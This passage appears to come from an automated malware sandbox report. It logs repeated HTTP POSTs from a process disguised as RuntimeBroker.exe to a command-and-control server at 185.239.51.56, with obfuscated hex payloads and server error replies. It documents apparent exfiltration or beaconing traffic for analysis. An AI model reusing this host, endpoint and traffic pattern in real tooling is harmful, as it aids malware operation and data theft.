                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:50.758596897 CET2504OUTData Raw: 53 5e 5e 55 5a 5d 5b 50 5f 5a 5a 53 57 5d 56 55 5f 5e 5d 40 51 54 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^^UZ][P_ZZSW]VU_^]@QTWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['@?<"5&0;;9?4"++66 087&Q2."^%#[.6
                                                                                                  Jan 1, 2025 02:27:51.101479053 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:51.111953974 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:50 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  52192.168.2.449794185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:51.238217115 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:51.597038984 CET2504OUTData Raw: 56 52 5b 57 5a 56 5b 51 5f 5a 5a 53 57 58 56 55 5f 5e 5d 44 51 5c 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VR[WZV[Q_ZZSWXVU_^]DQ\W[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['C(>523%/.6Y(7%*;=Z"%& +,3;?24&--"^%#[."
                                                                                                  Jan 1, 2025 02:27:51.939886093 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:51.947170019 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:51 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  53192.168.2.449795185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:52.068526983 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:52.425163984 CET2504OUTData Raw: 53 5e 5e 5f 5f 5d 5b 54 5f 5a 5a 53 57 5e 56 56 5f 5d 5d 48 51 51 57 5a 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^^__][T_ZZSW^VV_]]HQQWZ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['A+<!T<\2#<;=:=4"(;:6%Y 8Q%;^1$!:="^%#[.
                                                                                                  Jan 1, 2025 02:27:52.779947042 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:52.917870045 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:52 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  54192.168.2.449796185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:53.036608934 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2496
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:53.394942999 CET2496OUTData Raw: 53 5e 5e 52 5a 58 5e 57 5f 5a 5a 53 57 59 56 56 5f 5d 5d 40 51 57 57 5f 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^^RZX^W_ZZSWYVV_]]@QWW_^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['B+,%!2,2[;=?"_(6">Y ^4%;8_$'):"^%#[."
                                                                                                  Jan 1, 2025 02:27:53.747189999 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:53.757153988 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:53 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  55192.168.2.449798185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:53.878933907 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:54.237657070 CET2504OUTData Raw: 56 52 5e 5e 5f 5b 5b 53 5f 5a 5a 53 57 5a 56 51 5f 5b 5d 46 51 55 57 5e 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VR^^_[[S_ZZSWZVQ_[]FQUW^^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['E?"X#2$Y% [--2]?B.?+=X5C.Y7$+Z&Q:X,-"^%#[.*


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  56192.168.2.449799185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:54.290532112 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:54.643901110 CET1600OUTData Raw: 56 5c 5e 5f 5a 5e 5b 56 5f 5a 5a 53 57 5f 56 50 5f 5d 5d 42 51 52 57 59 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V\^_Z^[V_ZZSW_VP_]]BQRWY^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['C+<6!0Z% /.:=7=(81Y"&X78T3?%>^--"^%#[.>
                                                                                                  Jan 1, 2025 02:27:55.001338959 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:55.174442053 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:54 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  57192.168.2.449800185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:54.409318924 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:54.753259897 CET2504OUTData Raw: 53 5d 5e 52 5a 5b 5b 5d 5f 5a 5a 53 57 5d 56 56 5f 59 5d 41 51 50 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S]^RZ[[]_ZZSW]VV_Y]AQPW[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['<=5Z23(Z-="[=7.\<5C"Z#8#3$]1":"^%#[.6
                                                                                                  Jan 1, 2025 02:27:55.114847898 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:55.173346043 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:55 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  58192.168.2.449806185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:55.302218914 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:55.302258015 CET2504OUTData Raw: 56 5f 5e 57 5a 5c 5b 52 5f 5a 5a 53 57 58 56 5e 5f 5e 5d 42 51 56 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V_^WZ\[R_ZZSWXV^_^]BQVWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+5!"2(Y86?'9(56X#;7Q';$_&7."^%#[."
                                                                                                  Jan 1, 2025 02:27:56.034147978 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:56.045001984 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:55 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  59192.168.2.449812185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:56.314662933 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:56.659555912 CET2504OUTData Raw: 53 59 5e 55 5f 58 5b 50 5f 5a 5a 53 57 58 56 52 5f 54 5d 49 51 53 57 5f 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SY^U_X[P_ZZSWXVR_T]IQSW_^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+"6<X&',.<B9<1^6%!"(($8<[%2_:"^%#[."
                                                                                                  Jan 1, 2025 02:27:57.033912897 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:57.041899920 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:56 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  60192.168.2.449818185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:57.160756111 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:57.518896103 CET2504OUTData Raw: 53 5d 5e 5f 5f 58 5b 52 5f 5a 5a 53 57 58 56 5e 5f 5f 5d 48 51 52 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S]^__X[R_ZZSWXV^__]HQRWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['A<,"$[&0+8-<<!X!%1 ^/$8?%'=-"^%#[."
                                                                                                  Jan 1, 2025 02:27:57.863013029 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:57.870934010 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:57 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  61192.168.2.449826185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:57.988245964 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:58.347083092 CET2504OUTData Raw: 56 59 5e 57 5a 5f 5e 50 5f 5a 5a 53 57 50 56 57 5f 5f 5d 44 51 54 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VY^WZ_^P_ZZSWPVW__]DQTW]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(61<X% 8%<<8)"%& ?T'84%7=--"^%#[.
                                                                                                  Jan 1, 2025 02:27:58.690412998 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:58.697778940 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:58 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  62192.168.2.449833185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:58.818903923 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:59.175158978 CET2504OUTData Raw: 56 5d 5e 56 5a 5a 5e 53 5f 5a 5a 53 57 58 56 57 5f 5c 5d 49 51 53 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V]^VZZ^S_ZZSWXVW_\]IQSWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['B+*["!8[%8[/.6[+(!X!>_#8#%;$&'."^%#[."
                                                                                                  Jan 1, 2025 02:27:59.520526886 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:59.529906034 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:59 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  63192.168.2.449840185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:59.659266949 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:00.003308058 CET2504OUTData Raw: 56 5f 5e 52 5f 5d 5b 5d 5f 5a 5a 53 57 51 56 53 5f 58 5d 44 51 50 57 5f 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V_^R_][]_ZZSWQVS_X]DQPW_^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$<!#"/'0?/*]?7"+(6%.Z78'Q0+4^272,-"^%#[.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  64192.168.2.449843185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:00.180835962 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1572
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:00.534584045 CET1572OUTData Raw: 56 5e 5e 53 5f 5d 5b 52 5f 5a 5a 53 57 5e 56 5f 5f 55 5d 45 51 55 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^^S_][R_ZZSW^V__U]EQUWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(*Z#232 Y/6\?4*86%48W$8?%"--"^%#[.
                                                                                                  Jan 1, 2025 02:28:00.887928963 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:00.896472931 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:00 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  65192.168.2.449844185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:00.418203115 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:00.768995047 CET2504OUTData Raw: 56 5a 5b 53 5f 5c 5b 50 5f 5a 5a 53 57 5a 56 52 5f 5c 5d 46 51 51 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VZ[S_\[P_ZZSWZVR_\]FQQWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['+2Z"1;%#/2<71+=[6)7+,04^1$>9="^%#[.*
                                                                                                  Jan 1, 2025 02:28:01.122096062 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:01.287503958 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:01 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
